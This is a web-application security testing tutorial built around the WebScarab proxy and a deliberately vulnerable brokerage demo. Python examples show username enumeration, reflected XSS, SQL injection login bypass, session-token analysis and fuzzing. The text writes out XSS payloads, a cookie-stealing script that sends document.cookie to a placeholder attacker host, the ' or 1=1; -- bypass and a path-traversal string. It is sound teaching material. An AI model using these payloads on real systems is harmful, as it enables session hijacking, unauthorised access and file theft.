Agenda
• What is a proxy?
• Setting up your environment
• Pre-login tests
• Post-login tests
• Conclusion
A man in the middle proxy
• The proxy sits between the client (the browser) and the server
• Here we can inspect and modify all requests and replies to and from the server
Advantages
• More powerful than 'save-and-edit' attacks (saving the page locally, editing the form HTML and resubmitting it)
– Proxies are effective on AJAX sites, where there is no static form to save
• We receive requests after the browser completes its JavaScript routines and client-side validation, so those checks are bypassed
• Transparent to both the client and the server
WebScarab
• WebScarab is an open-source proxy provided by OWASP
• http://www.owasp.org/index.php/Category:OWASP_Project
• Written in Java with a Swing interface
Sample Application: Broken Brokerage
• Demo application written in Java with several common classes of vulnerabilities
• Simulates a brokerage service with stock trading
Test: Account Enumeration
• Check whether it is possible to enumerate valid account names using the system
– Login error messages
– Forgotten-password pages
Attempt valid logins
• Try a login that does exist (with a wrong password), then one that does not, and compare the two responses
– Any login you know is valid
– Admin/Administrator
– Test
Check for differences
• Any difference between the error messages for a valid and an invalid username is enough to enumerate logins
– Even a missing period!
– Compare the whole response in the proxy (status code, length, headers), not just the visible text
• Password recovery pages often reveal whether the username is known
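A worked version of the test above, added here as an example and not taken from the presentation or from Broken Brokerage. The login handler is a constructed stand-in whose two failure messages differ only by a trailing period; the comparison routine treats any difference in status, length or body as a signal, which is what you would look for in the proxy's response view.

```python
import difflib

# Constructed stand-in for a careless login handler (not Broken Brokerage code).
# The two failure messages differ only in the trailing period, which is exactly
# the slip the slide warns about.
VALID_USERS = {"admin": "s3cret", "alice": "hunter2"}  # constructed sample data


def fake_login(username, password):
    """Return (status, body) the way a careless login page might."""
    if username not in VALID_USERS:
        return 200, "<p>Invalid username or password</p>"
    if VALID_USERS[username] != password:
        return 200, "<p>Invalid username or password.</p>"
    return 302, ""


def diff_responses(baseline, candidate):
    """List every observable difference between two (status, body) responses:
    status code, body length and the changed lines of the body."""
    status_a, body_a = baseline
    status_b, body_b = candidate
    diffs = []
    if status_a != status_b:
        diffs.append(f"status {status_a} != {status_b}")
    if len(body_a) != len(body_b):
        diffs.append(f"length {len(body_a)} != {len(body_b)}")
    for line in difflib.unified_diff(body_a.splitlines(), body_b.splitlines(),
                                     lineterm="", n=0):
        if line.startswith(("+", "-")) and not line.startswith(("+++", "---")):
            diffs.append(line)
    return diffs


def enumerate_users(candidates, login=fake_login):
    """Report which candidate usernames the server treats differently from a
    name that certainly does not exist. Any difference at all counts."""
    baseline = login("zz-no-such-user-zz", "wrong-password")
    return [name for name in candidates
            if diff_responses(baseline, login(name, "wrong-password"))]


if __name__ == "__main__":
    baseline = fake_login("zz-no-such-user-zz", "wrong-password")
    for name in ["admin", "bob", "alice", "test"]:
        print(name, diff_responses(baseline, fake_login(name, "wrong-password")))
    print("enumerated:", enumerate_users(["admin", "bob", "alice", "test"]))
```

Against a live target the same comparison would be run on responses captured through the proxy, and response time is worth recording alongside status and length, since a valid username often triggers a password check that an unknown one skips.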
Test: Input validation
• Check to ensure input validation is taking place on the server, not only in browser-side JavaScript
• Use meta characters
– < > ( ' " ;
• Common test string
– <script>alert("XSS");</script>
What to look for
• Note that the Admin username we inserted is reflected in the page outside any quoted section
– If it were inside a quoted attribute value we would have to close the quotes in our string first.
– For example: "<script>alert("XSS");</script> (closing the tag as well, with ">, is usually needed)
Cross-site Scripting explained
• Phishing attacks often use the ability to inject code into a web page.
• A cookie can represent a logged-in session
• If we can send the cookie to another site, we can hijack the session
How to test
• Edit the request in the proxy before it is sent to the server
• Add in a string containing JavaScript as a test
Stealing the cookie
• <script>alert(document.cookie);</script>
• An attacker could send this cookie to another server as an image name, e.g. by having the script set an image's src to a URL on the attacker's server with document.cookie appended
– Only cookies set without the HttpOnly flag are readable from document.cookie
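The input-validation test and the XSS test above come down to one question: does the probe come back raw, and in what part of the page does it land? The following is an added example (not the presentation's or Broken Brokerage's code) with constructed stand-ins for a page that reflects the username into text, into a quoted attribute, and into a quoted attribute with output encoding. The context check is a simple scan for an unclosed tag and an odd number of quotes before the reflection point; for the attribute case it closes both the quote and the tag (`">`), going one step beyond the bare `"` on the slide. The hostname attacker.example in the exfiltration payload is a placeholder.

```python
import html

XSS_PROBE = '<script>alert("XSS");</script>'


# Constructed stand-ins for pages that echo the submitted username back.
# The first two are deliberately vulnerable (no server-side validation, no
# output encoding); the third is the hardened form of the second.
def reflect_in_text(username):
    return f"<html><body><p>Login failed for user {username}</p></body></html>"


def reflect_in_attribute(username):
    return f'<html><body><form><input name="user" value="{username}"></form></body></html>'


def reflect_in_attribute_hardened(username):
    safe = html.escape(username, quote=True)  # encodes < > & " '
    return f'<html><body><form><input name="user" value="{safe}"></form></body></html>'


def reflection_context(body, marker):
    """Where does `marker` land in `body`?
    'text'      - raw, in element content: <script> runs as-is
    'attribute' - raw, but inside a quoted attribute value: close the quote first
    'escaped'   - only the HTML-encoded form is present: output encoding is in place
    'absent'    - not reflected at all
    """
    i = body.find(marker)
    if i < 0:
        return "escaped" if html.escape(marker, quote=True) in body else "absent"
    before = body[:i]
    last_lt, last_gt = before.rfind("<"), before.rfind(">")
    if last_lt > last_gt:  # the reflection point is inside a tag
        tag_prefix = before[last_lt:]
        if tag_prefix.count('"') % 2 or tag_prefix.count("'") % 2:
            return "attribute"  # an unclosed quote precedes it
    return "text"


def build_payload(context, js='alert("XSS");'):
    """Adapt the probe to the reflection context. For an attribute value we
    close the quote and the tag before the script element."""
    script = f"<script>{js}</script>"
    return '">' + script if context == "attribute" else script


# Cookie-stealing variant of the script: load an "image" from the attacker's
# server with the victim's cookie in the URL (attacker.example is a placeholder).
COOKIE_EXFIL_JS = 'new Image().src="http://attacker.example/c?"+document.cookie;'

if __name__ == "__main__":
    canary = "zzQX9"  # harmless marker used to locate the reflection point first
    for page in (reflect_in_text, reflect_in_attribute, reflect_in_attribute_hardened):
        ctx = reflection_context(page(canary), canary)
        payload = build_payload(ctx, COOKIE_EXFIL_JS)
        print(f"{page.__name__}: context={ctx}, payload reflected raw={payload in page(payload)}")
```

The two-step approach (harmless canary to find the context, then a context-specific payload) is how a proxy-driven test usually proceeds; the hardened page still reports the canary as landing in an attribute, which is correct, and only the encoded probe shows that output encoding is in place.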
Test: SQL Injection
• It may be possible to inject code that will run on the database's SQL interpreter
• Classic example (entered in the username field)
– ' or 1=1; --
The result
• The results show the attacker has been logged in without a valid password
• This attack will often result in the attacker being logged in as the first user in the DB, which is commonly the admin account
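The classic payload run end to end, as an added example that is not the presentation's or Broken Brokerage's code. The user table is a constructed in-memory SQLite database (plaintext passwords only to keep the demo short); the vulnerable login builds its query by string formatting, so the `--` comments out the password check and `1=1` matches every row, and the first row returned is the admin account. The parameterized version beside it treats the same input purely as data.

```python
import sqlite3

CLASSIC_PAYLOAD = "' or 1=1; --"
QUERY_TEMPLATE = "SELECT username FROM users WHERE username = '%s' AND password = '%s'"


def make_db():
    """In-memory stand-in for the brokerage's user table (constructed sample
    data; real applications store password hashes, not passwords)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("admin", "s3cret"), ("alice", "hunter2"), ("bob", "letmein")])
    return conn


def injected_query(username, password):
    """What the database actually receives when input is pasted into the SQL."""
    return QUERY_TEMPLATE % (username, password)


def login_vulnerable(conn, username, password):
    """Builds the query by string formatting: the user's input becomes SQL."""
    row = conn.execute(injected_query(username, password)).fetchone()
    return row[0] if row else None


def login_hardened(conn, username, password):
    """Same lookup with bound parameters: the input is only ever data."""
    row = conn.execute("SELECT username FROM users WHERE username = ? AND password = ?",
                       (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    conn = make_db()
    print(injected_query(CLASSIC_PAYLOAD, "anything"))
    print("vulnerable login returns:", login_vulnerable(conn, CLASSIC_PAYLOAD, "anything"))
    print("hardened login returns:  ", login_hardened(conn, CLASSIC_PAYLOAD, "anything"))
```

Printing the injected query is the part worth keeping in a real test: seeing `WHERE username = '' or 1=1; --' AND password = '...'` makes it obvious why the password clause no longer participates.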
Spider the site
• Look for functionality that shouldn't be exposed
– Admin pages
– Default content shipped with the web server
Analyze cookies
• Collect a large number of session tokens (>1k)
• Visually analyze them for patterns (fixed positions, counters, timestamps)
• This will likely yield results against homebrew tokens
Analysis of JSESSIONID
• The Java servlet container generates JSESSIONID
• There are no patterns to be found in this case
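A mechanical version of the visual analysis, covering both the homebrew case and the JSESSIONID case above. This is an added example, not the presentation's code: the two token sets are constructed here, a "counter plus offset printed as hex" scheme standing in for a homebrew token and Python's secrets module standing in for the container's generator. Per-position entropy exposes padding and fixed prefixes; reading the tokens as integers in collection order exposes a counter.

```python
import math
import secrets
from collections import Counter

# Constructed token sets, 2000 each (the slide's ">1k"). HOMEBREW imitates a
# counter-plus-offset scheme printed as hex; RANDOM is what a proper generator
# produces (secrets stands in here for the servlet container's JSESSIONID).
HOMEBREW = [f"{0x5A17C000 + 7 * i:016x}" for i in range(2000)]
RANDOM = [secrets.token_hex(8) for _ in range(2000)]


def position_entropy(tokens):
    """Shannon entropy in bits of the character at each position, taken across
    all tokens. A uniformly random hex digit gives log2(16) = 4 bits."""
    width = min(len(t) for t in tokens)
    result = []
    for pos in range(width):
        counts = Counter(t[pos] for t in tokens)
        total = sum(counts.values())
        result.append(-sum(c / total * math.log2(c / total) for c in counts.values()))
    return result


def constant_positions(tokens):
    """Positions whose character never changes: padding or a fixed prefix."""
    return [pos for pos, bits in enumerate(position_entropy(tokens)) if bits == 0.0]


def looks_like_counter(tokens):
    """True when the tokens, read as hex integers in the order collected,
    advance by one constant step: the next token is then trivially predictable."""
    values = [int(t, 16) for t in tokens]
    deltas = [b - a for a, b in zip(values, values[1:])]
    return len(set(deltas)) == 1


def summarize(tokens):
    bits = position_entropy(tokens)
    return {
        "constant_positions": constant_positions(tokens),
        "min_bits_per_char": round(min(bits), 2),
        "counter_like": looks_like_counter(tokens),
    }


if __name__ == "__main__":
    print("homebrew:", summarize(HOMEBREW))
    print("random:  ", summarize(RANDOM))
```

Twelve of the sixteen hex positions in the homebrew set never change and the remainder step by a fixed delta, so the whole token is predictable from one sample; the random set has no constant positions and close to four bits per character, which is the "no patterns" outcome the JSESSIONID slide reports. Tokens that survive this check are not proven strong (an MD5 of a counter would pass it too), so the test rules schemes out rather than in.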
Exploit hidden variables
• Programmers may store sensitive data (such as prices or account identifiers) in hidden form fields, trusting the browser to send them back unchanged
• WebScarab allows inline editing of those fields before the request reaches the server
Using the fuzzer
• Create a set of fuzz strings
– XSS, format strings, long strings, unusual characters
• Supply the malicious input to the program
• Look for interesting errors or system crashes
Create fuzz strings
• Create a file of strings that could cause issues
• Here we create a simple test of 200 A's
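A generator for the fuzz file described in the last two slides, added here as an example rather than taken from the presentation or from WebScarab. It covers the four categories the slide lists (XSS, format strings, long strings including the 200 A's, unusual characters) and writes one value per line, which is the layout assumed here for a WebScarab fuzz-source file; values containing line breaks are dropped because they would corrupt a line-based file.

```python
import string


def fuzz_strings(long_length=200):
    """Build the fuzz values: one entry per line in the output file (the
    line-based layout is an assumption about WebScarab's source files)."""
    values = []
    # XSS probes, including the attribute-breaking variant
    values += ['<script>alert("XSS");</script>',
               '"><script>alert("XSS");</script>',
               "<img src=x onerror=alert(1)>"]
    # format strings, for input that reaches printf-style functions
    values += ["%s%s%s%s%s", "%n%n%n%n", "%x%x%x%x", "%08x.%08x.%08x"]
    # long strings: the slide's 200 A's plus two larger sizes
    values += ["A" * long_length, "A" * 1024, "A" * 8192]
    # unusual characters: meta characters, SQL, path and null-byte tricks,
    # non-ASCII text and a Unicode right-to-left override
    values += ["<>(\"';", "' or 1=1; --", "../../../../etc/passwd", "%00",
               "\u00e9\u00fc\u00f1", "\u202e"]
    # every ASCII punctuation character on its own
    values += list(string.punctuation)
    # the file is line based, so anything with a line break cannot be represented
    return [v for v in values if "\n" not in v and "\r" not in v]


def render_fuzz_file(values):
    """Serialize the values in the one-per-line layout."""
    return "\n".join(values) + "\n"


def write_fuzz_file(path, values=None):
    """Write the fuzz file and return the number of values written."""
    values = values if values is not None else fuzz_strings()
    with open(path, "w", encoding="utf-8") as f:
        f.write(render_fuzz_file(values))
    return len(values)


if __name__ == "__main__":
    count = write_fuzz_file("fuzz-strings.txt")
    print(f"wrote {count} fuzz strings to fuzz-strings.txt")
```

When reviewing the results, the interesting responses are the ones that differ from the baseline in status code, length or error text, not only outright crashes; a stack trace or a database error message in an HTTP 500 page is often the first sign of the injection points tested earlier.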